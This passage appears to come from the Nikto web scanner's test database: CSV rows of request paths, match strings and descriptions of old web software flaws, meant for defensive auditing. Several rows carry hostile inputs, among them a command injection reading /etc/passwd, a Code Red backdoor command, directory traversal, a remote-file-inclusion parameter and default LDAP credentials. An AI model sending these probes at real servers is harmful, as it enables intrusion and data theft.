headers","","","","","Some versions of PHP reveal PHP's physical path on the server by appending /123 to the PHP file name.","","" "000094","7510","3","/mambo/index.php?Itemid=JUNK(5)","GET","exceeded in \/","","","","","Mambo Site Server 4.0.11 reveals the web server path.","","" "000095","23654","3","/profile.php?u=JUNK(8)","GET","Warning:","","","","","Powerboards is vulnerable to path disclosure.","","" "000096","0","3","/ticket.php?id=99999","GET","expects first argument","","","","","ZenTrack from http://zentrack.phpzen.net/ versions v2.0.3, v2.0.2beta and older reveal the web root with certain errors.","","" "000097","4911","3","/vgn/login/1,501,,00.html?cookieName=x--\>","GET","value=\"x--","","","","","Vignette server may leak memory with an invalid request. Upgrade to the latest version.","","" "000098","0","3","/a%5c.aspx","GET","Invalid file name for monitoring:","","","","","Older Microsoft .NET installations allow full path disclosure.","","" "000099","0","7","@CGIDIRSbanner.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","","" "000100","0","7","@CGIDIRSbannereditor.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","","" "000101","599","7","@CGIDIRSbook.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","","" "000102","0","7","/admin/browse.asp?FilePath=c:\&Opt=2&level=0","GET","winnt","","","","","Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely.","","" "000103","0","8","@CGIDIRSarchitext_query.pl","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.","","" "000104","0","8","@CGIDIRSbizdb1-search.cgi","GET","200","","","","","This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm","","" "000105","0","b","@CGIDIRSblog/","GET","200","","","","","A blog was found. May contain security problems in CGIs, weak passwords, and more.","","" "000106","0","b","/tsweb/","GET","200","","","","","Microsoft TSAC found. http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html","","" "000107","0","1b","@CGIDIRSblog/mt-load.cgi","GET","200","","","","","Movable Type weblog installation CGI found. May be able to reconfigure or reload.","","" "000108","14538","c","@CGIDIRSatk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL","GET","PHP Version","","","","","Achievo can be made to include PHP files from another domain. Upgrade to a new version.","","" "000109","0","23","/vgn/performance/TMT","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000110","0","23","/vgn/performance/TMT/Report","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000111","0","23","/vgn/performance/TMT/Report/XML","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000112","0","23","/vgn/performance/TMT/reset","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000113","0","23","/vgn/ppstats","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000114","0","23","/vgn/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000115","0","23","/vgn/record/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000116","0","23","/vgn/stylepreviewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000117","0","23","/vgn/vr/Deleting","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000118","0","23","/vgn/vr/Editing","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000119","0","23","/vgn/vr/Saving","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000120","0","23","/vgn/vr/Select","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000121","0","23","/scripts/iisadmin/bdir.htr","GET","200","","","","","This default script shows host info, may allow file browsing and buffer a overrun in the Chunked Encoding data transfer mechanism, request /scripts/iisadmin/bdir.htr??c:\ . MS02-028. CA-2002-09.","","" "000122","0","2a","/scripts/iisadmin/ism.dll","GET","200","","","","","Allows you to mount a brute force attack on passwords","","" "000123","0","2a","/scripts/tools/ctss.idc","GET","200","","","","","This CGI allows remote users to view and modify SQL DB contents, server paths, docroot and more.","","" "000124","0","3","/bigconf.cgi","GET","200","","","","","BigIP Configuration CGI","","" "000125","0","3","/billing/billing.apw","GET","PASS BOX CAPTION:","","","","","CoffeeCup password wizard allows password files to be read remotely.","","" "000126","0","3","/blah_badfile.shtml","GET","200","","","","","Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.","","" "000127","0","3","/blah-whatever-badfile.jsp","GET","Script \/","","","","","The web server is configured to respond with the web server path when requesting a non-existent .jsp file.","","" "000128","4910","3","/vgn/style","GET","200","","","","","Vignette server may reveal system information through this file.","","" "000129","0","3","/scripts/no-such-file.pl","GET","perl script","","","","","Using perl.exe allows attackers to view host info. Use perlis.dll instead.","","" "000130","17653","3","/SiteServer/Admin/commerce/foundation/domain.asp","GET","200","","","","","Displays known domains of which that server is involved.","","" "000131","17654","3","/SiteServer/Admin/commerce/foundation/driver.asp","GET","200","","","","","Displays a list of installed ODBC drivers.","","" "000132","17655","3","/SiteServer/Admin/commerce/foundation/DSN.asp","GET","200","","","","","Displays all DSNs configured for selected ODBC drivers."," ","" "000133","17652","3","/SiteServer/admin/findvserver.asp","GET","200","","","","","Gives a list of installed Site Server components.","","" "000134","0","3","/SiteServer/Admin/knowledge/dsmgr/default.asp","GET","200","","","","","Used to view current search catalog configurations","","" "000135","1909","4","@CGIDIRScgiwrap/%3Cfont%20color=red%3E","GET","","","","","","cgiwrap allows HTML and possibly XSS injection. See http://archives.neohapsis.com/archives/bugtraq/2001-07/0499.html for details.","","" "000136","2878","4","@CGIDIRSmoin.cgi?test","GET","200","","","","","MoinMoin 1.1 and prior contain at least two XSS vulnerabilities. Version 1.0 and prior also contains a XSLT related vulnerability","","" "000138","0","4","/basilix/mbox-list.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page","","" "000139","0","4","/basilix/message-read.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page","","" "000140","0","4","/clusterframe.jsp","GET","200","","","","","Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.","","" "000141","0","4","/IlohaMail/blank.html","GET","200","","","","","IlohaMail 0.8.10 contains a XSS vulnerability. Previous versions contain other non-descript vulnerabilities.","","" "000142","0","8","/bb-dnbd/faxsurvey","GET","200","","","","","This may allow arbitrary command execution.","","" "000143","0","8","/cartcart.cgi","GET","200","","","","","If this is Dansie Shopping Cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands.","","" "000144","6591","8","/scripts/Carello/Carello.dll","GET","200","","","","","Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto.","","" "000145","0","a","/scripts/tools/dsnform.exe","GET","200","","","","","Allows creation of ODBC Data Source","","" "000146","0","a","/scripts/tools/dsnform","GET","200","","","","","Allows creation of ODBC Data Source","","" "000147","17656","a","/SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp","GET","200","","","","","Used to create, modify, and potentially delete LDAP users and groups.","","" "000148","17657","a","/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp","GET","200","","","","","Used to create, modify, and potentially delete LDAP users and groups.","","" "000149","0","b","/prd.i/pgen/","GET","200","","","","","Has MS Merchant Server 1.0","","" "000150","0","b","/readme.eml","GET","200","","","","","Remote server may be infected with the Nimda virus.","","" "000151","0","b","/scripts/httpodbc.dll","GET","200","","","","","Possible IIS backdoor found.","","" "000152","0","b","/scripts/proxy/w3proxy.dll","GET","502","","","","","MSProxy v1.0 installed","","" "000153","0","b","/scripts/root.exe?/c+dir+c:\+/OG","GET","Directory of c","","","","","This machine is infected with Code Red, or has Code Red leftovers.","","" "000154","0","b","/SiteServer/admin/","GET","403","","","","","Site Server components admin. Default account may be 'LDAP_Anonymous', pass is 'LdapPassword_1'. see http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm","","" "000155","0","1","/siteseed/","GET","200","","","","","Siteseed pre 1.4.2 has 'major' security problems.","","" "000156","0","2","/scripts/samples/search/author.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed. MS01-033.","","" "000157","0","2","/scripts/samples/search/filesize.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed. MS01-033.","","" "000158","0","2","/scripts/samples/search/filetime.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed. MS01-033.","","" "000159","0","2","/scripts/samples/search/queryhit.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed. MS01-033.","","" "000160","0","2","/scripts/samples/search/simple.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed. MS01-033.","","" "000161","0","23","/pccsmysqladm/incs/dbconnect.inc","GET","200","","","","","This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher.","","" "000162","0","23","/iisadmin/","GET","200","","","is restricted to Localhost","","Access to /iisadmin should be restricted to localhost or allowed hosts only.","","" "000163","51201","3","/password.inc","GET","globalpw","","","","","GTCatalog 0.9 admin password was retrieved remotely.","","" "000164","0","3","/PDG_Cart/oder.log","GET","200","","","","","Shopping cart software log","","" "000165","0","3","/web-console/ServerInfo.jsp%00","GET","<\%=","","","","","JBoss 3.2.1 with jetty seems to disclose source code.","","" "000166","0","3","/global.asa","GET","RUNAT","","","","","The global.asa file was retrieved, which may contain sensitive information. Map the .asa extension to the proper dll.","","" "000167","0","23","/exchange/lib/AMPROPS.INC","GET","Logon functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000168","0","23","/exchange/lib/DELETE.INC","GET","deleting objects","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000169","0","23","/exchange/lib/GETREND.INC","GET","GetRenderer functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000170","0","23","/exchange/lib/GETWHEN.INC","GET","functions to construct","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000171","0","23","/exchange/lib/JSATTACH.INC","GET","Attachment Javascript","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000172","0","23","/exchange/lib/JSROOT.INC","GET","Javascript Functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000173","0","23","/exchange/lib/JSUTIL.INC","GET","Common Javascript","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000174","0","23","/exchange/lib/LANG.INC","GET","localized strings","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000175","0","23","/exchange/lib/logon.inc","GET","Logon functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000176","0","23","/exchange/lib/PAGEUTIL.INC","GET","functions that help","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000177","0","23","/exchange/lib/PUBFLD.INC","GET","Anonymous Published","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000178","0","23","/exchange/lib/RENDER.INC","GET","Rendering functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000179","0","23","/exchange/lib/SESSION.INC","GET","Session Management","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000180","0","5","/ows/restricted%2eshow","GET","200","","","","","OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.","","" "000181","0","5","/WEB-INF./web.xml","GET","200","","","","","Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others. See http://www.westpoint.l","","" "000182","0","7","/view_source.jsp","GET","200","License Exception","","","","Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \..\ directory traversal. This script may be vulnerable.","","" "000183","0","8","/w-agora/","GET","200","","","","","w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install.","","" "000184","42680","a","/vider.php3","GET","200","","","","","MySimpleNews may allow deleting of news items without authentication.","","" "000185","0","a","/exchange/root.asp?acs=anon","GET","\/exchange\/logonfrm\.asp","","","","","This allows anonymous access to portions of the OWA server. http://support.microsoft.com/support/exchange/content/whitepapers/owaguide.doc","","" "000186","6181","a","/officescan/cgi/cgiChkMasterPwd.exe","GET","200","","","","","Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.","","" "000187","0","b","/%NETHOOD%/","GET","Microsoft Windows Network","","","","","The machine may be infected with the Bugbear.B virus. http://www.f-secure.com/v-descs/bugbear_b.shtml","","" "000188","0","d","@CGIDIRSastrocam.cgi","GET","200","","","","","Astrocam 1.4.1 contained buffer overflow BID-4684. Prior to 2.1.3 contained unspecified security bugs","","" "000189","0","d","@CGIDIRSbadmin.cgi","GET","200","","","","","BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.","","" "000190","2017","d","@CGIDIRSboozt/admin/index.cgi?section=5&input=1","GET","200","","","","","Boozt CGI may have a buffer overflow. Upgrade to a version newer than 0.9.8alpha.","","" "000191","0","d","@CGIDIRSezadmin.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","","" "000192","0","d","@CGIDIRSezboard.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","","" "000193","0","d","@CGIDIRSezman.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","","" "000194","11740","d","@CGIDIRSfoxweb.dll","GET","200","","","","","Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.","","" "000195","11741","d","@CGIDIRSfoxweb.exe","GET","200","","","","","Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.","","" "000196","0","d","@CGIDIRSmgrqcgi","GET","200","","","","","This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.","","" "000197","0","d","@CGIDIRSwconsole.dll","GET","200","","","","","It may be possible to overflow this dll with 1024 bytes of data.","","" "000198","0","d","@CGIDIRSwebplus.exe?about","GET","Product Information","","","","","Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability. Versions prior to 4.6 build 561 and 5.0 build 554 have a buffer overflow.","","" "000199","0","d","/pbserver/pbserver.dll","GET","200","","","","","This may contain a buffer overflow. http://www.microsoft.com/technet/security/bulletin/ms00-094.asp","","" "000200","0","0","/administrator/gallery/uploadimage.php","GET","200","","","","","Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension.","","" "000201","0","0","/pafiledb/includes/team/file.php","GET","200","","","","","paFileDB 3.1 and below may allow file upload without authentication.","","" "000202","0","0","/phpEventCalendar/file_upload.php","GET","200","","","","","phpEventCalendar 1.1 and prior are vulnerable to file upload bug.","","" "000203","0","0","/servlet/com.unify.servletexec.UploadServlet","GET","200","Error Occurred","","","","This servlet allows attackers to upload files to the server.","","" "000204","0","0","@CGIDIRSuploader.exe","GET","200","","","","","This CGI allows attackers to upload files to the server and then execute them.","","" "000205","0","0","/scripts/cpshost.dll","GET","200","","","","","Posting acceptor possibly allows you to upload files","","" "000206","0","0","/scripts/repost.asp","GET","Here is your upload status","","","","","This allows uploads to /users. Create /users and give web user read only access.","","" "000207","0","0","/upload.asp","GET","200","","","","","An ASP page that allows attackers to upload files to server","","" "000208","0","0","/uploadn.asp","GET","200","","","","","An ASP page that allows attackers to upload files to server","","" "000209","0","0","/uploadx.asp","GET","200","","","","","An ASP page that allows attackers to upload files to server","","" "000210","0","0","/wa.exe","GET","200","","","","","An ASP page that allows attackers to upload files to server","","" "000211","0","1","/basilix/compose-attach.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a non-descript security vulnerability in compose-attach.php3 related to attachment uploads","","" "000212","0","1","/server/","GET","200","","","","","If port 8000, Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.","","" "000213","0","1","@CGIDIRSfpsrvadm.exe","GET","200","","","","","Potentially vulnerable CGI program.","","" "000214","0","1b","/siteminder/smadmin.html","GET","Admin Login","","","","","SiteMinder admin login page available.","","" "000215","0","1b","/vgn/ac/data","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000216","0","1b","/vgn/ac/delete","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000217","0","1b","/vgn/ac/edit","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000218","0","1b","/vgn/ac/esave","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000219","0","1b","/vgn/ac/fsave","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000220","0","1b","/vgn/ac/index","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000221","0","1b","/vgn/asp/MetaDataUpdate","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000222","0","1b","/vgn/asp/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000223","0","1b","/vgn/asp/status","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000224","0","1b","/vgn/asp/style","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000225","0","1b","/vgn/errors","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000226","0","1b","/vgn/jsp/controller","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000227","0","1b","/vgn/jsp/errorpage","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000228","0","1b","/vgn/jsp/initialize","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000229","0","1b","/vgn/jsp/jspstatus","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000230","0","1b","/vgn/jsp/jspstatus56","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000231","0","1b","/vgn/jsp/metadataupdate","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000232","0","1b","/vgn/jsp/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000233","0","1b","/vgn/jsp/style","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000234","0","1b","/vgn/legacy/edit","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000235","0","1b","/vgn/login","GET","200","","","","","Vignette server may allow user enumeration based on the login attempts to this file.","","" "000236","0","2","/webtop/wdk/samples/index.jsp","GET","WDK Fusion Samples","","","","","Documentum Webtop Example Code","","" "000237","0","2","@CGIDIRS.cobalt","GET","200","","","","","May allow remote admin of CGI scripts.","","" "000238","0","2","/WEB-INF/web.xml","GET","web-app","","","","","JRUN default file found.","","" "000239","35707","23","/forum/admin/wwforum.mdb","GET","200","","","","","Web Wiz Forums password database found.","","" "000240","0","23","/fpdb/shop.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web."," ","" "000241","52975","23","/guestbook/admin/o12guest.mdb","GET","200","","","","","Ocean12 ASP Guestbook Manager allows download of SQL database which contains admin password.","","" "000242","15971","23","/midicart.mdb","GET","200","","","","","MIDICART database is available for browsing. This should not be allowed via the web server.","","" "000243","15971","23","/MIDICART/midicart.mdb","GET","200","","","","","MIDICART database is available for browsing. This should not be allowed via the web server.","","" "000244","41850","23","/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb","GET","200","","","","","MPCSoftWeb Guest Book passwords retrieved.","","" "000245","0","23","/news/news.mdb","GET","200","","","","","Web Wiz Site News release v3.06 admin password database is available and unencrypted.","","" "000246","420","23","/newuser?Image=../../database/rbsserv.mdb","GET","SystemErrorsPerHour","","","","","The Extent RBS ISP 2.5 allows attackers to read arbitrary files on the server.","","" "000247","0","23","/shopdbtest.asp","GET","xDatabase","","","","","VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase).","","" "000248","53413","23","/shopping300.mdb","GET","200","","","","","VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.","","" "000249","53413","23","/shopping400.mdb","GET","200","","","","","VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.","","" "000250","15971","23","/shoppingdirectory/midicart.mdb","GET","200","","","","","MIDICART database is available for browsing. This should not be allowed via the web server.","","" "000251","17113","23","/SilverStream/Meta/Tables/?access-mode=text","GET","_DBProduct","","","","","The SilverStream database structure is available for remote viewing.","","" "000252","4398","23","/database/db2000.mdb","GET","200","","","","","Max Web Portal database is available remotely. It should be moved from the default location to a directory outside the web root.","","" "000253","319","28","@CGIDIRSmailit.pl","GET","200","","","","","Sambar may allow anonymous email to be sent from any host via this CGI.","","" "000254","0","3","@CGIDIRSsearch","GET","=sourcedir","","","","","Apache Stronghold 3.0 may reveal the web root in the source of this CGI ('sourcedir' value).","","" "000255","0","3","/doc/webmin.config.notes","GET","login and password","","","","","Webmin config file found, may contain Webmin ID/Password. Typically runs on port 10000.","","" "000256","0","3","/error/HTTP_NOT_FOUND.html.var","GET","Available variants","","","","","Apache reveals file system paths when invalid error documents are requested.","","" "000257","0","3","/oem_webstage/cgi-bin/oemapp_cgi","GET","This script","","","","","Oracle reveals the CGI source by prepending /oem_webstage to CGI URLs.","","" "000258","0","3","@ADMINconfig.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","","" "000259","0","3","@CGIDIRS.access","GET","200","","","","","Contains authorization information","","" "000260","11093","3","@CGIDIRS%2e%2e/abyss.conf","GET","200","","","","","The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/","","" "000261","2396","3","@CGIDIRSdata/fetch.php?page=","GET","mysql_num_rows","","","","","Stellar Docs allows remote users to see file system paths. BID-8385.","","" "000262","0","3","@CGIDIRSempower?DB=whateverwhatever","GET","db name whateverwhatever of directory \/","","","","","This CGI allows attackers to learn the full system path to your web directory.","","" "000263","0","3","@CGIDIRSmrtg.cgi?cfg=blah","GET","Cannot find the given config file","","","","","Multi Router Traffic Grapher (mrtg.org) reveals system paths when an invalid config file is specified. Software should be upgraded to the latest version.","","" "000264","5734","3","@CGIDIRSstore/agora.cgi?page=whatever33.html","GET","FILE:","","","","","Agora.cgi gives detailed error messages including file system paths.","","" "000265","59658","3","/?mod=node&nid=some_thing&op=view","GET","\/node\.module\.php","","","","","Sage 1.0b3 may reveal system paths with invalid module names.","","" "000266","59658","3","/?mod=some_thing&op=browse","GET","Cannot instantiate non-existent class","","","","","Sage 1.0b3 reveals system paths with invalid module names.","","" "000267","7170","3","/article.php?article=4965&post=1111111111","GET","Unable to jump to row","","","","","PHP FirstPost can reveal MySQL errors and file system paths if invalid posts are sent.","","" "000268","0","3","/blah123.php","GET","Failed opening ","","","","","PHP is configured to give descriptive error messages that can reveal file system paths.","","" "000269","12649","3","/categorie.php3?cid=june","GET","Unable to jump to row","","","","","Black Tie Project (BTP) can reveal MySQL errors and file system paths if an invalid cid is sent.","","" "000270","3233","3","/CFIDE/probe.cfm","GET","coldfusion\.tagext\.lang","","","","","Cold Fusion file probe.cfm reveals system information, such as the path to the web server. In the 'Debugging Settings' page in the Administrator console, suppress the installation path displayed in error messages by selecting 'Enable Robust Exception Info","","" "000271","0","3","/contents.php?new_language=elvish&mode=select","GET","200","","","","","Requesting a file with an invalid language selection from DC Portal may reveal the system path.","","" "000272","0","3","/download.php?op=viewdownload","GET","Failed opening","","","","","PHP-Nuke allows file system paths to be revealed.","","" "000273","0","3","/download.php?op=viewdownload","GET","Fatal error","","","","","PHP-Nuke allows file system paths to be revealed.","","" "000274","59400","3","/examples/basic/servlet/HelloServlet","GET","The source of this servlet is in","","","","","Caucho Resin from http://www.caucho.com/ reveals file system paths with a default servlet.","","" "000275","5289","3","/home.php?arsc_language=elvish","GET","Failed opening '","","","","","ARSC Really Simple Chat can reveal file system paths if an invalid language name is specified.","","" "000276","0","3","/hostadmin/?page='","GET","C:\\\\","","","","","Host Admin reveals install location and other sensitive information.","","" "000277","0","3","/hostadmin/?page='","GET","D:\\\\","","","","","Host Admin reveals install location and other sensitive information.","","" "000278","0","3","/index.php?file=index.php","GET","Fatal error:","","","","","PHP-Nuke 5.4 allows file system paths to be shown in error messages.","","" "000279","40589","3","/jgb_eng_php3/cfooter.php3","GET","Fatal error","","","","","Justice Guestbook may reveal file system paths in error messages.","","" "000280","0","3","/JUNK(5).csp","GET","File not found: \/","","","","","Invalid files with .csp extension reveal the file system path to the web root.","","" "000281","0","3","/modules.php?name=Downloads&d_op=viewdownload","GET","Failed opening","","","","","PHP-Nuke allows file system paths to be revealed.","","" "000282","0","3","/modules.php?name=Downloads&d_op=viewdownload","GET","Fatal error","","","","","PHP-Nuke allows file system paths to be revealed.","","" "000283","0","3","/modules.php?op=modload&name=0&file=0","GET","Failed opening ","","","","","PHP-Nuke is configured to give descriptive error messages that can reveal file system paths.","","" "000284","0","3","/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=","GET","non-object in","","","","","Postnuke v0.7.2.3-Phoenix and below reveal the file system path.","","" "000285","0","3","/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink","GET","Failed opening ","","","","","PHP-Nuke is configured to give descriptive error messages that can reveal file system paths.","","" "000286","2394","3","/path/nw/article.php?id='","GET","c:\/","","","","","News Wizard 2.0 reveals the file system path.","","" "000287","2394","3","/path/nw/article.php?id='","GET","d:\/","","","","","News Wizard 2.0 reveals the file system path.","","" "000288","6467","3","/pw/storemgr.pw","GET","200","","","","","Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information.","","" "000289","4245","3","/rtm.log","GET","HttpPost Retry","","","","","Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information.","","" "000290","43917","3","/scozbook/view.php?PG=whatever","GET","Warning:\sSupplied","","","","","ScozBook Beta 1.1 may reveal file system paths in error messages.","","" "000291","0","3","/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter","GET","200","Error Occurred","","","","Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.","","" "000292","0","3","/shopa_sessionlist.asp","GET","200","","","","","VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.","","" "000293","53303","3","/simplebbs/users/users.php","GET","200","","","","","Simple BBS 1.0.6 allows user information and passwords to be viewed remotely.","","" "000294","44056","3","/sips/sipssys/users/a/admin/user","GET","Password","","","","","SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.","","" "000295","3093","2","/tcb/files/auth/r/root","GET","u_pwd","","","","","HP-UX has the tcb auth file system on the web server.","","" "000296","0","3","/typo3conf/","GET","200","","","","","This may contain sensitive Typo3 files.","","" "000297","0","3","/typo3conf/database.sql","GET","200","","","","","Typo3 SQL file found.","","" "000298","0","3","/typo3conf/localconf.php","GET","200","","","","","Typo3 config file found.","","" "000299","53386","3","/vchat/msg.txt","GET","200","","","","","VChat allows user information to be retrieved.","","" "000300","4907","3","/vgn/license","GET","200","","","","","Vignette server license file found.","","" "000301","3092","3","/web.config","GET","","","200","","","ASP config file is accessible.","","" "000302","3233","3","/webamil/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" "000303","0","3","/webcart-lite/config/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","","" "000304","0","3","/webcart-lite/orders/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","","" "000305","0","3","/webcart/carts/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","","" "000306","0","3","/webcart/config/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","","" "000307","0","3","/webcart/config/clients.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","","" "000308","0","3","/webcart/orders/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","","" "000309","0","3","/webcart/orders/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","","" "000310","0","3","/webmail/horde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","","" "000311","0","3","/whateverJUNK(4).html","GET","InterScan HTTP Version","","","","","InterScan VirusWall on the remote host reveals its version number in HTTP error messages.","","" "000312","0","3","/ws_ftp.ini","GET","200","","","","","Can contain saved passwords for FTP sites","","" "000313","0","3","/WS_FTP.ini","GET","200","","","","","Can contain saved passwords for FTP sites","","" "000314","11871","3","@CGIDIRSMsmMask.exe","GET","200","","","","","MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.","","" "000315","0","3","/_mem_bin/auoconfig.asp","GET","200","","","","","Displays the default AUO (LDAP) schema, including host and port.","","" "000316","0","3","/_mem_bin/auoconfig.asp","GET","LDAP","","","","","LDAP information revealed via asp. See http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm","","" "000317","17664","3","/_mem_bin/remind.asp","GET","Recover","","","","","Page will give the password reminder for any user requested (username must be known).","","" "000318","0","3","/exchange/lib/ATTACH.INC","GET","File upload","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000319","17659","3","/SiteServer/Admin/knowledge/persmbr/vs.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","","" "000320","17661","3","/SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","","" "000321","17662","3","/SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","","" 